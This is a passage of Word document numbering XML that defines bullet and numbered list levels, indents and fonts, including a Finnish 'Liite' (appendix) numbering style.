    <w:lvl w:ilvl="2" w:tplc="8CE49EFC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D9A40098">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="232A8422">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9D82F900">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="3208D784">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7B5E5358">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A6825CB8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="02FAF291"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="9280E09A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Aptos" w:hAnsi="Aptos"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F056ADAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7E7A976C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9AC63252">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FFCE0602">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DDC80624">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CBB2EEFE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="24541C1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D222F9A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11"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0A1E5424"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74488B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1B331F1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="6CCC5D88">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="8)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="890E6288">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="660AEC02">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BAAAB0CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="342A8730">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9F6C9EBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="26DC116A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="921CC7F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E0F830EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D26B031"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="501CB592">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1A64DB24">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8F32DC98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="563466D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="ADB48030">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0E0A1A2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8E3625E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7592F8CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A24EF8A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="20BD333C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FB8011E"/>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7"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256A0622"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F9E8D00"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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19"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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="320222BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5146731A"/>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21"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36FF1D23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0F280FE"/>
    <w:lvl w:ilvl="0" w:tplc="59D80C30">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040B0005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040B0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040B0005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040B0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="040B0005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="370165B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8CBEB55A"/>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24" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E9C176D"/>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6"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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4992189F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="100869B8"/>
    <w:lvl w:ilvl="0" w:tplc="55622CBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Liite %1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"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49980384"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="040B001D"/>
    <w:lvl w:ilvl="0" w:tplc="6D189BD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FEEEBAF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="BF78D7A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="978A05C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%4)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2D186A1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="(%5)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0D96A9E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%6)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="BF9A2E98">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="ED382510">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2FDEDE6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4D17EE86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="6712AB0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="206081FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EA80C5BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E766EBA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EE806BB2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="087AA6AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="325678E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B78CF7A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="58CE466C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32"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56303C08"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="631A42B4"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B285C2C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D184B48"/>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6"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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="65A41D94"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3D05306"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6B98D4B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="8EB8909A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0E6467D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8398D1A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8DB6F39C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4A446F0E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F7028922">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6CA464A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="91D4007E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="18107C28">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="39"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717A1911"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="991430C2"/>
    <w:lvl w:ilvl="0" w:tplc="040B0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="040B0005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="040B0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="040B0003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="040B0005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="040B0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
